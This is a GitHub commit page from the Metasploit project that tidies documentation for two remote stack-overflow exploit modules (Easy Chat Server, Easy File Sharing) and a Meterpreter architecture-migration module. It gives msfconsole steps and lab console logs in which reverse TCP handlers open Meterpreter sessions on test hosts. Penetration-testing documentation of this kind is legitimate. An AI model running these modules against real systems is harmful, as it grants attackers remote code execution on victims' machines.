Skip to content

Commit fb905c4

Browse files
committed
Land rapid7#8754, fix some module documentation
2 parents a140209 + 7c55cdc commit fb905c4

File tree

3 files changed

+31
-28
lines changed

3 files changed

+31
-28
lines changed
Lines changed: 12 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -1,28 +1,28 @@
11
## Description
22

3-
This module exploits a vulnerability in the EFS Easy Chat Server application, from version 2 to 3.1, affecting the username parameter in Registration page 'register.ghp', which is prone to a stack overflow vulnerability.
3+
This module exploits a vulnerability in the EFS Easy Chat Server application versions 2 through 3.1. The username parameter in the Registration page 'register.php', which is prone to a stack overflow vulnerability.
44

5-
This module allows a remote attacker to get a payload executed under the context of the user running the Easy Chat Server application
5+
This module allows a remote attacker to execute a payload under the context of the user running the Easy Chat Server application
66

77
## Vulnerable Application
88

9-
[Easy Chat Server](http://echatserver.com/) Easy Chat Server is a easy, fast and affordable way to host and manage real-time communication software.
9+
[Easy Chat Server](http://echatserver.com/) Easy Chat Server is an easy, fast and affordable way to host and manage real-time communication software.
1010

1111
This module has been tested successfully on
1212

13-
* Easy Chat Server 3.1 on Windows XP En SP3
13+
* Easy Chat Server 3.1 on Windows XP En SP3
1414

1515
Installers:
1616

1717
[EFS Easy Chat Server Installers](http://echatserver.com/ecssetup.exe)
1818

1919
## Verification Steps
2020

21-
1. Start `msfconsole`
22-
2. Do: `use exploits/windows/http/easychatserver_seh`
23-
3. Do: `set rhosts [IP]`
24-
4. Do: `exploit`
25-
5. You should get your payload executed
21+
1. Start `msfconsole`
22+
2. Do: `use exploits/windows/http/easychatserver_seh`
23+
3. Do: `set rhosts [IP]`
24+
4. Do: `exploit`
25+
5. You should get your payload executed
2626

2727
## Scenarios
2828

@@ -32,11 +32,11 @@ msf > use exploit/windows/http/easychatserver_seh
3232
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
3333
RHOST => 192.168.56.101
3434
msf exploit(easychatserver_seh) > exploit
35-
35+
3636
[*] Started reverse TCP handler on 192.168.56.1:4444
3737
[*] Sending stage (957487 bytes) to 192.168.56.101
3838
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
39-
39+
4040
meterpreter > sysinfo
4141
Computer : MM-8B040C5B05D9
4242
OS : Windows XP (Build 2600, Service Pack 3).
@@ -47,7 +47,7 @@ Logged On Users : 2
4747
Meterpreter : x86/windows
4848
meterpreter > exit
4949
[*] Shutting down Meterpreter...
50-
50+
5151
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
5252
msf exploit(easychatserver_seh) >
5353
```
Lines changed: 11 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -1,28 +1,28 @@
11
## Description
22

3-
This module exploits a vulnerability in the Easy File Sharing Web Server application, by exploiting an overflow in the Email Post parameter, through DEP bypass via ROP chain.
3+
This module exploits a vulnerability in the Easy File Sharing Web Server application. It uses an overflow in the Email Post parameter, bypassing DEP via a ROP chain.
44

5-
This module allows a remote attacker to get a payload executed under the context of the user running the Easy File Sharing application
5+
This module allows a remote attacker to execute a payload under the context of the user running the Easy File Sharing application
66

77
## Vulnerable Application
88

99
[Easy File Sharing](http://www.sharing-file.com/) is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE, Firefox, Chrome etc.).
1010

1111
This module has been tested successfully on
1212

13-
* Easy File Sharing 7.2 on Windows XP En Sp3
13+
* Easy File Sharing 7.2 on Windows XP En Sp3
1414

1515
Installers:
1616

1717
[Easy File Sharing Installers](http://www.sharing-file.com/efssetup.exe)
1818

1919
## Verification Steps
2020

21-
1. Start `msfconsole`
22-
2. Do: `use exploits/windows/http/easyfilesharing_post`
23-
3. Do: `set rhosts [IP]`
24-
4. Do: `exploit`
25-
5. You should get your payload executed
21+
1. Start `msfconsole`
22+
2. Do: `use exploits/windows/http/easyfilesharing_post`
23+
3. Do: `set rhosts [IP]`
24+
4. Do: `exploit`
25+
5. You should get your payload executed
2626

2727
## Scenarios
2828

@@ -32,11 +32,11 @@ msf > use exploit/windows/http/easyfilesharing_post
3232
msf exploit(easyfilesharing_post) > set RHOST 192.168.56.101
3333
RHOST => 192.168.56.101
3434
msf exploit(easyfilesharing_post) > exploit
35-
35+
3636
[*] Started reverse TCP handler on 192.168.56.1:4444
3737
[*] Sending stage (957487 bytes) to 192.168.56.101
3838
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1253) at 2017-06-17 22:45:34 +0200
39-
39+
4040
meterpreter > sysinfo
4141
Computer : MM
4242
OS : Windows XP (Build 2600, Service Pack 3).
@@ -47,7 +47,7 @@ Logged On Users : 2
4747
Meterpreter : x86/windows
4848
meterpreter > exit
4949
[*] Shutting down Meterpreter...
50-
50+
5151
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
5252
msf exploit(easyfilesharing_post) >
5353
```

modules/post/windows/manage/archmigrate.md renamed to documentation/modules/post/windows/manage/archmigrate.md

Lines changed: 8 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,6 @@
11
## Creating A Testing Environment
2-
To use this module you need an x86 executable type meterpreter on a x64 windows machine.
2+
3+
To use this module you need an x86 executable type meterpreter on a x64 windows machine.
34

45
This module has been tested against:
56

@@ -23,9 +24,10 @@ This module was not tested against, but may work against:
2324

2425
### Windows 10 x64
2526

27+
```
2628
msf exploit(handler) > run
2729
28-
[*] Started reverse TCP handler on <MSF_IP>:4567
30+
[*] Started reverse TCP handler on <MSF_IP>:4567
2931
[*] Starting the payload handler...
3032
[*] Sending stage (957487 bytes) to <Win10x64_IP>
3133
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:50917) at 2017-03-22 11:43:42 -0500
@@ -39,8 +41,8 @@ This module was not tested against, but may work against:
3941
Logged On Users : 2
4042
Meterpreter : x86/windows
4143
meterpreter > background
42-
[*] Backgrounding session 1...
43-
msf exploit(handler) > use post/windows/manage/archmigrate
44+
[*] Backgrounding session 1...
45+
msf exploit(handler) > use post/windows/manage/archmigrate
4446
msf post(archmigrate) > set session 1
4547
session => 1
4648
msf post(archmigrate) > run
@@ -70,4 +72,5 @@ This module was not tested against, but may work against:
7072
System Language : en_US
7173
Domain : WORKGROUP
7274
Logged On Users : 2
73-
Meterpreter : x64/windows
75+
Meterpreter : x64/windows
76+
```

0 commit comments

Comments
 (0)